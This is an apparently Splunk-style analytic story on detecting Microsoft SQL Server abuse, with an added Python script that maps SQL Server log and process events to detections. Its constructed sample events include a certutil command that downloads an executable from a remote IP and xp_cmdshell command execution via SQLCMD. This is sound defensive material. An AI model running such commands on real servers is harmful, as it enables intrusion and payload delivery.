Analytics Story: SQL Server Abuse

Description

This analytic story addresses various techniques used by threat actors to abuse Microsoft SQL Server for maintaining persistence, executing malicious commands, and exfiltrating data. It focuses on detecting suspicious SQLCMD usage, startup procedure modifications, DLL procedure loads, and other SQL Server abuse patterns that may indicate compromise.

Why it matters

Microsoft SQL Server is a common target for threat actors because of its widespread enterprise deployment and the powerful capabilities it exposes. Attackers abuse built-in SQL Server features and components to achieve their objectives. Common patterns include using SQLCMD.exe for command execution and data exfiltration, creating or modifying startup procedures for persistence, and loading malicious DLLs through SQL Server extended stored procedures. Threat actors also frequently execute operating-system commands through xp_cmdshell and other extended stored procedures, use SQL Server Agent for scheduled task execution, and abuse trusted connections and elevated privileges.

The detections in this story identify suspicious SQLCMD.exe execution patterns and modifications to SQL Server startup procedures. They also cover unusual DLL loading through SQL Server, suspicious query patterns and command execution, anomalous authentication attempts, and potential data exfiltration indicators.

Organizations should monitor SQL Server activity closely, especially use of administrative features and extended stored procedures. A comprehensive approach includes least-privilege access, proper auditing, and regular review of SQL Server configuration. Together these measures reduce the risk from the SQL Server abuse techniques described here.

Detections

Name                                                     Technique                           Type
Windows PowerShell Invoke-Sqlcmd Execution               PowerShell, Windows Command Shell   Hunting
Windows SQL Server Configuration Option Hunt             SQL Stored Procedures               Hunting
Windows SQL Server Critical Procedures Enabled           SQL Stored Procedures               TTP
Windows SQL Server Extended Procedure DLL Loading Hunt   SQL Stored Procedures, Cloud API    Hunting
Windows SQL Server Startup Procedure                     SQL Stored Procedures               Anomaly
Windows SQL Server xp_cmdshell Config Change             SQL Stored Procedures               TTP
Windows SQL Spawning CertUtil                            Ingress Tool Transfer               TTP
Windows SQLCMD Execution                                 Windows Command Shell               Hunting
Windows Sqlservr Spawning Shell                          SQL Stored Procedures               TTP

Data Sources

Name                                    Platform   Sourcetype                  Source
CrowdStrike ProcessRollup2              N/A        crowdstrike:events:sensor   crowdstrike
Powershell Script Block Logging 4104    Windows    xmlwineventlog              XmlWinEventLog:Microsoft-Windows-PowerShell/Operational
Sysmon EventID 1                        Windows    xmlwineventlog              XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
Windows Event Log Application 15457     Windows    XmlWinEventLog              XmlWinEventLog:Application
Windows Event Log Application 17135     Windows    XmlWinEventLog              XmlWinEventLog:Application
Windows Event Log Application 8128      Windows    XmlWinEventLog              XmlWinEventLog:Application
Windows Event Log Security 4688         Windows    xmlwineventlog              XmlWinEventLog:Security
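As an added example (not part of the original story and not Splunk's own search logic), the following Python script shows how the three SQL Server Application-log events listed above (15457 configuration option changed, 17135 startup procedure launched, 8128 extended procedure DLL loaded) and process-creation events (Sysmon 1, Security 4688, ProcessRollup2) can be classified against the detections in this story. The sample events are constructed; the list of critical options, the baseline of stock extended-procedure DLLs and the name-to-detection mapping are assumptions that approximate what each detection's name suggests, not the story's actual SPL.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Message shapes of the SQL Server Application-log events this story lists as data sources.
CONFIG_OPTION_RE = re.compile(
    r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)")
STARTUP_PROC_RE = re.compile(r"Launched startup procedure '(?P<proc>[^']+)'")
XP_DLL_RE = re.compile(
    r"Using '(?P<dll>[^']+)' version '(?P<ver>[^']+)' to execute extended stored procedure '(?P<proc>[^']+)'")

# sp_configure options whose enabling usually precedes command execution or DLL loading.
# Assumption: tune this set to what your estate legitimately enables.
CRITICAL_OPTIONS = {"xp_cmdshell", "ole automation procedures", "ad hoc distributed queries",
                    "clr enabled", "external scripts enabled"}
# DLLs a stock SQL Server install uses for its own extended procedures. Assumption: baseline
# this from a clean instance of your version rather than trusting a fixed list.
KNOWN_XP_DLLS = {"xpstar.dll", "xplog70.dll", "xpsqlbot.dll", "odsole70.dll", "xprepl.dll"}
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe"}


@dataclass
class Finding:
    detection: str  # story detection the event maps to
    kind: str       # "TTP", "Anomaly" or "Hunting", as in the story's Type column
    detail: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_application_event(event_id: int, message: str) -> Optional[Finding]:
    """Classify a SQL Server Application-log event (15457, 17135 or 8128)."""
    if event_id == 15457:
        m = CONFIG_OPTION_RE.search(message)
        if not m:
            return None
        option, old, new = m["option"].lower(), int(m["old"]), int(m["new"])
        if option == "xp_cmdshell" and new == 1:
            return Finding("Windows SQL Server xp_cmdshell Config Change", "TTP", f"{option} {old}->{new}")
        if option in CRITICAL_OPTIONS and old == 0 and new == 1:
            return Finding("Windows SQL Server Critical Procedures Enabled", "TTP", f"{option} {old}->{new}")
        # Any other option change (including disabling) is worth a look but not an alert on its own.
        return Finding("Windows SQL Server Configuration Option Hunt", "Hunting", f"{option} {old}->{new}")
    if event_id == 17135:
        m = STARTUP_PROC_RE.search(message)
        return Finding("Windows SQL Server Startup Procedure", "Anomaly", m["proc"]) if m else None
    if event_id == 8128:
        m = XP_DLL_RE.search(message)
        if not m or _basename(m["dll"]) in KNOWN_XP_DLLS:
            return None  # unparseable, or a stock DLL that logs on every Agent start
        return Finding("Windows SQL Server Extended Procedure DLL Loading Hunt", "Hunting",
                       f"{m['dll']} -> {m['proc']}")
    return None


def check_process_event(parent_image: str, image: str, command_line: str) -> Optional[Finding]:
    """Classify a process-creation event (Sysmon 1, Security 4688 or ProcessRollup2 fields)."""
    parent, child = _basename(parent_image), _basename(image)
    if parent == "sqlservr.exe" and child == "certutil.exe":
        return Finding("Windows SQL Spawning CertUtil", "TTP", command_line)
    if parent == "sqlservr.exe" and child in SHELL_IMAGES:
        return Finding("Windows Sqlservr Spawning Shell", "TTP", command_line)
    if child == "sqlcmd.exe":
        return Finding("Windows SQLCMD Execution", "Hunting", command_line)
    if child in {"powershell.exe", "pwsh.exe"} and "invoke-sqlcmd" in command_line.lower():
        return Finding("Windows PowerShell Invoke-Sqlcmd Execution", "Hunting", command_line)
    return None


# Constructed sample events (not real telemetry); messages follow the SQL Server wording.
APP_EVENTS = [
    (15457, "Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install."),
    (15457, "Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install."),
    (15457, "Configuration option 'Ole Automation Procedures' changed from 0 to 1. Run the RECONFIGURE statement to install."),
    (17135, "Launched startup procedure 'sp_persist_shell'."),
    (8128, "Using 'xpstar.dll' version '2019.150.2000' to execute extended stored procedure 'xp_sqlagent_is_starting'. This is an informational message only; no user action is required."),
    (8128, "Using 'C:\\Temp\\xp_evil.dll' version '1.0.0.0' to execute extended stored procedure 'xp_evil'. This is an informational message only; no user action is required."),
]
PROCESS_EVENTS = [
    (r"C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe",
     r"C:\Windows\System32\cmd.exe", "cmd.exe /c whoami"),
    (r"C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe",
     r"C:\Windows\System32\certutil.exe", "certutil -urlcache -split -f http://198.51.100.7/a.exe C:\\Temp\\a.exe"),
    (r"C:\Windows\System32\cmd.exe", r"C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\170\Tools\Binn\SQLCMD.EXE",
     "SQLCMD -S . -E -Q \"EXEC xp_cmdshell 'whoami'\""),
    (r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell -NoP -C Invoke-Sqlcmd -ServerInstance . -Query 'SELECT name FROM sys.databases'"),
]


def run_samples() -> list:
    """Return the findings the two checks produce over the constructed sample events."""
    findings = [check_application_event(e, msg) for e, msg in APP_EVENTS]
    findings += [check_process_event(*ev) for ev in PROCESS_EVENTS]
    return [f for f in findings if f is not None]


if __name__ == "__main__":
    for f in run_samples():
        print(f"[{f.kind:7}] {f.detection}: {f.detail}")
```

The stock-DLL baseline matters in practice: event 8128 fires for xpstar.dll every time SQL Server Agent starts, so without a baseline the DLL-loading hunt is mostly noise, while a DLL loaded from a path outside the instance's Binn directory is what the hunt is meant to surface.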

Source: GitHub | Version: 1